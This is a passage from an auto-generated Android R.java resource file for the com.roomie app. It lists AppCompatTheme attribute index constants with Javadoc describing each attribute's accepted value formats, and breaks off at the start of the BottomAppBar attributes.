"<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:colorSwitchThumbNormal */ public static final int AppCompatTheme_colorSwitchThumbNormal = 92; /** <p> @attr description The background used by framework controls. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:controlBackground */ public static final int AppCompatTheme_controlBackground = 93; /** <p> @attr description Preferred corner radius of dialogs. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:dialogCornerRadius */ public static final int AppCompatTheme_dialogCornerRadius = 46; /** <p> @attr description Preferred padding for dialog content. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:dialogPreferredPadding */ public static final int AppCompatTheme_dialogPreferredPadding = 44; /** <p> @attr description Theme to use for dialogs spawned from this theme. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:dialogTheme */ public static final int AppCompatTheme_dialogTheme = 43; /** <p> @attr description A drawable that may be used as a horizontal divider between visual elements. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:dividerHorizontal */ public static final int AppCompatTheme_dividerHorizontal = 58; /** <p> @attr description A drawable that may be used as a vertical divider between visual elements. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:dividerVertical */ public static final int AppCompatTheme_dividerVertical = 57; /** <p> @attr description ListPopupWindow compatibility <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:dropDownListViewStyle */ public static final int AppCompatTheme_dropDownListViewStyle = 76; /** <p> @attr description The preferred item height for dropdown lists. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:dropdownListPreferredItemHeight */ public static final int AppCompatTheme_dropdownListPreferredItemHeight = 48; /** <p> @attr description EditText background drawable. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:editTextBackground */ public static final int AppCompatTheme_editTextBackground = 65; /** <p> @attr description EditText text foreground color. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This is a private symbol. @attr name com.roomie:editTextColor */ public static final int AppCompatTheme_editTextColor = 64; /** <p> @attr description Default EditText style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:editTextStyle */ public static final int AppCompatTheme_editTextStyle = 108; /** <p> @attr description Specifies a drawable to use for the 'home as up' indicator. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:homeAsUpIndicator */ public static final int AppCompatTheme_homeAsUpIndicator = 50; /** <p> @attr description ImageButton background drawable. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:imageButtonStyle */ public static final int AppCompatTheme_imageButtonStyle = 66; /** <p> @attr description Drawable used as a background for selected list items. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:listChoiceBackgroundIndicator */ public static final int AppCompatTheme_listChoiceBackgroundIndicator = 84; /** <p> @attr description The list divider used in alert dialogs. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:listDividerAlertDialog */ public static final int AppCompatTheme_listDividerAlertDialog = 45; /** <p> @attr description Default menu-style ListView style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:listMenuViewStyle */ public static final int AppCompatTheme_listMenuViewStyle = 116; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#listPopupWindowStyle} attribute's value can be found in the {@link #AppCompatTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:listPopupWindowStyle */ public static final int AppCompatTheme_listPopupWindowStyle = 77; /** <p> @attr description The preferred list item height. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:listPreferredItemHeight */ public static final int AppCompatTheme_listPreferredItemHeight = 71; /** <p> @attr description A larger, more robust list item height. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:listPreferredItemHeightLarge */ public static final int AppCompatTheme_listPreferredItemHeightLarge = 73; /** <p> @attr description A smaller, sleeker list item height. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:listPreferredItemHeightSmall */ public static final int AppCompatTheme_listPreferredItemHeightSmall = 72; /** <p> @attr description The preferred padding along the left edge of list items. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:listPreferredItemPaddingLeft */ public static final int AppCompatTheme_listPreferredItemPaddingLeft = 74; /** <p> @attr description The preferred padding along the right edge of list items. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:listPreferredItemPaddingRight */ public static final int AppCompatTheme_listPreferredItemPaddingRight = 75; /** <p> @attr description The background of a panel when it is inset from the left and right edges of the screen. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:panelBackground */ public static final int AppCompatTheme_panelBackground = 81; /** <p> @attr description Default Panel Menu style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:panelMenuListTheme */ public static final int AppCompatTheme_panelMenuListTheme = 83; /** <p> @attr description Default Panel Menu width. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:panelMenuListWidth */ public static final int AppCompatTheme_panelMenuListWidth = 82; /** <p> @attr description Default PopupMenu style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:popupMenuStyle */ public static final int AppCompatTheme_popupMenuStyle = 62; /** <p> @attr description Default PopupWindow style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:popupWindowStyle */ public static final int AppCompatTheme_popupWindowStyle = 63; /** <p> @attr description Default RadioButton style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:radioButtonStyle */ public static final int AppCompatTheme_radioButtonStyle = 109; /** <p> @attr description Default RatingBar style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:ratingBarStyle */ public static final int AppCompatTheme_ratingBarStyle = 110; /** <p> @attr description Indicator RatingBar style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:ratingBarStyleIndicator */ public static final int AppCompatTheme_ratingBarStyleIndicator = 111; /** <p> @attr description Small indicator RatingBar style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:ratingBarStyleSmall */ public static final int AppCompatTheme_ratingBarStyleSmall = 112; /** <p> @attr description Style for the search query widget. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:searchViewStyle */ public static final int AppCompatTheme_searchViewStyle = 70; /** <p> @attr description Default SeekBar style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:seekBarStyle */ public static final int AppCompatTheme_seekBarStyle = 113; /** <p> @attr description A style that may be applied to buttons or other selectable items that should react to pressed and focus states, but that do not have a clear visual border along the edges. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:selectableItemBackground */ public static final int AppCompatTheme_selectableItemBackground = 54; /** <p> @attr description Background drawable for borderless standalone items that need focus/pressed states. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:selectableItemBackgroundBorderless */ public static final int AppCompatTheme_selectableItemBackgroundBorderless = 55; /** <p> @attr description Default Spinner style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:spinnerDropDownItemStyle */ public static final int AppCompatTheme_spinnerDropDownItemStyle = 49; /** <p> @attr description Default Spinner style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:spinnerStyle */ public static final int AppCompatTheme_spinnerStyle = 114; /** <p> @attr description Default style for the Switch widget. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:switchStyle */ public static final int AppCompatTheme_switchStyle = 115; /** <p> @attr description Text color, typeface, size, and style for the text inside of a popup menu. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:textAppearanceLargePopupMenu */ public static final int AppCompatTheme_textAppearanceLargePopupMenu = 40; /** <p> @attr description The preferred TextAppearance for the primary text of list items. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:textAppearanceListItem */ public static final int AppCompatTheme_textAppearanceListItem = 78; /** <p> @attr description The preferred TextAppearance for the secondary text of list items. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:textAppearanceListItemSecondary */ public static final int AppCompatTheme_textAppearanceListItemSecondary = 79; /** <p> @attr description The preferred TextAppearance for the primary text of small list items. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:textAppearanceListItemSmall */ public static final int AppCompatTheme_textAppearanceListItemSmall = 80; /** <p> @attr description Text color, typeface, size, and style for header text inside of a popup menu. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:textAppearancePopupMenuHeader */ public static final int AppCompatTheme_textAppearancePopupMenuHeader = 42; /** <p> @attr description Text color, typeface, size, and style for system search result subtitle. Defaults to primary inverse text color. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:textAppearanceSearchResultSubtitle */ public static final int AppCompatTheme_textAppearanceSearchResultSubtitle = 68; /** <p> @attr description Text color, typeface, size, and style for system search result title. Defaults to primary inverse text color. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:textAppearanceSearchResultTitle */ public static final int AppCompatTheme_textAppearanceSearchResultTitle = 67; /** <p> @attr description Text color, typeface, size, and style for small text inside of a popup menu. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:textAppearanceSmallPopupMenu */ public static final int AppCompatTheme_textAppearanceSmallPopupMenu = 41; /** <p> @attr description Color of list item text in alert dialogs. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This is a private symbol. @attr name com.roomie:textColorAlertDialogListItem */ public static final int AppCompatTheme_textColorAlertDialogListItem = 99; /** <p> @attr description Text color for urls in search suggestions, used by things like global search <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This is a private symbol. @attr name com.roomie:textColorSearchUrl */ public static final int AppCompatTheme_textColorSearchUrl = 69; /** <p> @attr description Default Toolar NavigationButtonStyle <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:toolbarNavigationButtonStyle */ public static final int AppCompatTheme_toolbarNavigationButtonStyle = 61; /** <p> @attr description Default Toolbar style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:toolbarStyle */ public static final int AppCompatTheme_toolbarStyle = 60; /** <p> @attr description Foreground color to use for tooltips <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This is a private symbol. @attr name com.roomie:tooltipForegroundColor */ public static final int AppCompatTheme_tooltipForegroundColor = 118; /** <p> @attr description Background to use for tooltips <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:tooltipFrameBackground */ public static final int AppCompatTheme_tooltipFrameBackground = 117; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#viewInflaterClass} attribute's value can be found in the {@link #AppCompatTheme} array. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:viewInflaterClass */ public static final int AppCompatTheme_viewInflaterClass = 120; /** <p> @attr description Flag indicating whether this window should have an Action Bar in place of the usual title bar. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:windowActionBar */ public static final int AppCompatTheme_windowActionBar = 2; /** <p> @attr description Flag indicating whether this window's Action Bar should overlay application content. Does nothing if the window would not have an Action Bar. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:windowActionBarOverlay */ public static final int AppCompatTheme_windowActionBarOverlay = 4; /** <p> @attr description Flag indicating whether action modes should overlay window content when there is not reserved space for their UI (such as an Action Bar). <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:windowActionModeOverlay */ public static final int AppCompatTheme_windowActionModeOverlay = 5; /** <p> @attr description A fixed height for the window along the major axis of the screen, that is, when in portrait. Can be either an absolute dimension or a fraction of the screen size in that dimension. <p>May be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>May be a fractional value, which is a floating point number appended with either % or %p, such as "<code>14.5%</code>". The % suffix always means a percentage of the base size; the optional %p suffix provides a size relative to some parent container. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:windowFixedHeightMajor */ public static final int AppCompatTheme_windowFixedHeightMajor = 9; /** <p> @attr description A fixed height for the window along the minor axis of the screen, that is, when in landscape. Can be either an absolute dimension or a fraction of the screen size in that dimension. <p>May be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>May be a fractional value, which is a floating point number appended with either % or %p, such as "<code>14.5%</code>". The % suffix always means a percentage of the base size; the optional %p suffix provides a size relative to some parent container. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:windowFixedHeightMinor */ public static final int AppCompatTheme_windowFixedHeightMinor = 7; /** <p> @attr description A fixed width for the window along the major axis of the screen, that is, when in landscape. Can be either an absolute dimension or a fraction of the screen size in that dimension. <p>May be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>May be a fractional value, which is a floating point number appended with either % or %p, such as "<code>14.5%</code>". The % suffix always means a percentage of the base size; the optional %p suffix provides a size relative to some parent container. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:windowFixedWidthMajor */ public static final int AppCompatTheme_windowFixedWidthMajor = 6; /** <p> @attr description A fixed width for the window along the minor axis of the screen, that is, when in portrait. Can be either an absolute dimension or a fraction of the screen size in that dimension. <p>May be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>May be a fractional value, which is a floating point number appended with either % or %p, such as "<code>14.5%</code>". The % suffix always means a percentage of the base size; the optional %p suffix provides a size relative to some parent container. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:windowFixedWidthMinor */ public static final int AppCompatTheme_windowFixedWidthMinor = 8; /** <p> @attr description The minimum width the window is allowed to be, along the major axis of the screen. That is, when in landscape. Can be either an absolute dimension or a fraction of the screen size in that dimension. <p>May be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>May be a fractional value, which is a floating point number appended with either % or %p, such as "<code>14.5%</code>". The % suffix always means a percentage of the base size; the optional %p suffix provides a size relative to some parent container. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:windowMinWidthMajor */ public static final int AppCompatTheme_windowMinWidthMajor = 10; /** <p> @attr description The minimum width the window is allowed to be, along the minor axis of the screen. That is, when in portrait. Can be either an absolute dimension or a fraction of the screen size in that dimension. <p>May be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>May be a fractional value, which is a floating point number appended with either % or %p, such as "<code>14.5%</code>". The % suffix always means a percentage of the base size; the optional %p suffix provides a size relative to some parent container. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:windowMinWidthMinor */ public static final int AppCompatTheme_windowMinWidthMinor = 11; /** <p> @attr description Flag indicating whether there should be no title on this window. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:windowNoTitle */ public static final int AppCompatTheme_windowNoTitle = 3; /** Attributes that can be used with a BottomAppBar. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #BottomAppBar_backgroundTint com.roomie:backgroundTint}</code></td><td> Tint to apply to the background.</td></tr> <tr><td><code>{@link #BottomAppBar_fabAlignmentMode com.roomie:fabAlignmentMode}</code></td><td></td></tr> <tr><td><code>{@link #BottomAppBar_fabCradleMargin com.roomie:fabCradleMargin}</code></td><td></td></tr> <tr><td><code>{@link #BottomAppBar_fabCradleRoundedCornerRadius com.roomie:fabCradleRoundedCornerRadius}</code></td><td></td></tr> <tr><td><code>{@link #BottomAppBar_fabCradleVerticalOffset com.roomie:fabCradleVerticalOffset}</code></td><td></td></tr> <tr><td><code>{@link #BottomAppBar_hideOnScroll com.roomie:hideOnScroll}</code></td><td></td></tr> </table> @see #BottomAppBar_backgroundTint @see #BottomAppBar_fabAlignmentMode @see #BottomAppBar_fabCradleMargin @see 